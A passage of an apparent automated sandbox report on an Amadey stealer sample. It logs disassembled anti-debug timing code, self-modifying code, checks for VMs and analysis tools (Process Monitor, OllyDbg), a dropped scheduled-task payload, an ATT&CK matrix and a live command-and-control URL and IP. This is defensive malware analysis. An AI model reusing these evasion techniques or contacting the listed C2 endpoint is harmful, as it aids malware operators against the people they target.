                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06A0 second address: 49D074F instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F05ECE231BBh 0x00000010 mov ebp, esp 0x00000012 jmp 00007F05ECE231C6h 0x00000017 push FFFFFFFEh 0x00000019 pushad 0x0000001a mov dx, cx 0x0000001d movzx ecx, dx 0x00000020 popad 0x00000021 push 6D214F8Ch 0x00000026 pushad 0x00000027 mov bl, ah 0x00000029 movsx edi, ax 0x0000002c popad 0x0000002d add dword ptr [esp], 09D7708Ch 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F05ECE231C2h 0x0000003b add esi, 26CEA3D8h 0x00000041 jmp 00007F05ECE231BBh 0x00000046 popfd 0x00000047 pushfd 0x00000048 jmp 00007F05ECE231C8h 0x0000004d sub si, EE38h 0x00000052 jmp 00007F05ECE231BBh 0x00000057 popfd 0x00000058 popad 0x00000059 call 00007F05ECE231B9h 0x0000005e pushad 0x0000005f movzx esi, bx 0x00000062 push eax 0x00000063 push edx 0x00000064 mov dx, 86B2h 0x00000068 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D074F second address: 49D0818 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F05ECFAD313h 0x00000008 jmp 00007F05ECFAD313h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F05ECFAD319h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F05ECFAD311h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F05ECFAD317h 0x00000029 xor ch, 0000001Eh 0x0000002c jmp 00007F05ECFAD319h 0x00000031 popfd 0x00000032 call 00007F05ECFAD310h 0x00000037 mov ch, 54h 0x00000039 pop edi 0x0000003a popad 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f jmp 00007F05ECFAD30Dh 0x00000044 pop eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F05ECFAD30Dh 0x0000004c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0818 second address: 49D0828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0828 second address: 49D0842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000000h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F05ECFAD30Ah 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0842 second address: 49D0872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 mov ebx, 108708F0h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ecx, 3A1C31A1h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F05ECE231C6h 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0872 second address: 49D0941 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F05ECFAD311h 0x00000009 and ah, FFFFFFD6h 0x0000000c jmp 00007F05ECFAD311h 0x00000011 popfd 0x00000012 jmp 00007F05ECFAD310h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 1Ch 0x0000001d jmp 00007F05ECFAD310h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov ax, A97Dh 0x00000028 mov eax, 2C0C6079h 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F05ECFAD30Fh 0x00000034 xchg eax, ebx 0x00000035 jmp 00007F05ECFAD316h 0x0000003a xchg eax, esi 0x0000003b jmp 00007F05ECFAD310h 0x00000040 push eax 0x00000041 pushad 0x00000042 mov ecx, ebx 0x00000044 pushfd 0x00000045 jmp 00007F05ECFAD30Dh 0x0000004a or esi, 21F9DD56h 0x00000050 jmp 00007F05ECFAD311h 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F05ECFAD30Dh 0x0000005f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0941 second address: 49D0965 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bl 0x00000005 mov dl, cl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05ECE231C7h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0965 second address: 49D0994 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F05ECFAD30Dh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0994 second address: 49D0A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F05ECE231C7h 0x00000008 pop eax 0x00000009 mov esi, edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [76FAB370h] 0x00000013 jmp 00007F05ECE231BBh 0x00000018 xor dword ptr [ebp-08h], eax 0x0000001b jmp 00007F05ECE231C6h 0x00000020 xor eax, ebp 0x00000022 pushad 0x00000023 mov di, si 0x00000026 popad 0x00000027 nop 0x00000028 pushad 0x00000029 jmp 00007F05ECE231BEh 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov cx, bx 0x00000034 mov dx, 9AA0h 0x00000038 popad 0x00000039 nop 0x0000003a jmp 00007F05ECE231BFh 0x0000003f lea eax, dword ptr [ebp-10h] 0x00000042 pushad 0x00000043 mov ecx, 123D6E0Bh 0x00000048 jmp 00007F05ECE231C0h 0x0000004d popad 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A35 second address: 49D0A52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A52 second address: 49D0A62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A62 second address: 49D0A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A66 second address: 49D0ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007F05ECE231C7h 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 jmp 00007F05ECE231C6h 0x00000018 test eax, eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F05ECE231BDh 0x00000023 and ax, 4F26h 0x00000028 jmp 00007F05ECE231C1h 0x0000002d popfd 0x0000002e jmp 00007F05ECE231C0h 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0ADC second address: 49D0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov eax, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F065F48C544h 0x00000010 jmp 00007F05ECFAD30Fh 0x00000015 sub eax, eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B03 second address: 49D0B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B07 second address: 49D0B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B0D second address: 49D0B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B1E second address: 49D0B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B22 second address: 49D0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B28 second address: 49D0B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B2E second address: 49D0B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [esi] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F05ECE231BEh 0x00000014 xor eax, 702537E8h 0x0000001a jmp 00007F05ECE231BBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [ebp-24h], ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F05ECE231C0h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0B7C second address: 49D0BF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b jmp 00007F05ECFAD316h 0x00000010 je 00007F065F48C3E0h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F05ECFAD30Dh 0x0000001f jmp 00007F05ECFAD30Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F05ECFAD318h 0x0000002b adc si, 3A38h 0x00000030 jmp 00007F05ECFAD30Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                  Tries to evade debugger and weak emulator (self modifying code)
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8E8A7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2C7CE7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: C5E8A7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: E97CE7 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A20C01 rdtsc 0_2_04A20C01
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 389Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1119Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1607Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5520Thread sleep count: 42 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5520Thread sleep time: -84042s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1628Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1628Thread sleep time: -72036s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4720Thread sleep count: 389 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4720Thread sleep time: -11670000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4824Thread sleep count: 1119 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4824Thread sleep time: -2239119s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3836Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6180Thread sleep count: 1607 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6180Thread sleep time: -3215607s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: file.exe, 00000000.00000002.2154010878.0000000000BB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                  Source: file.exe, 00000000.00000002.2148791457.000000000021A000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2184432930.0000000000DEA000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A20C01 rdtsc 0_2_04A20C01
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000003.00000002.2189407934.0000000000DEA000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 3.2.axplong.exe.bf0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.axplong.exe.bf0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000003.2659233267.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2143475152.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2147793843.0000000000021000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.2148769900.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.2107291680.0000000004800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2189315361.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2184346914.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping641
                  Security Software Discovery                  		Remote ServicesData from Local System1
                  Non-Application Layer Protocol                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media11
                  Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager251
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials213
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraTR/Crypt.TPM.Gen
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phptrue
                  • Avira URL Cloud: phishing
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.16
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1519654
                  Start date and time:2024-09-26 19:50:10 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 49s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                  EGA Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 4320 because there are no executed function
                  • Execution Graph export aborted for target axplong.exe, PID 4592 because there are no executed function
                  • Execution Graph export aborted for target file.exe, PID 2316 because it is empty
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  13:52:02API Interceptor251007x Sleep call for process: axplong.exe modified
                  19:51:08Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.16file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousPhorpiexBrowse
                  • 185.215.113.66
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1936896
                  Entropy (8bit):7.949909040231611
                  Encrypted:false
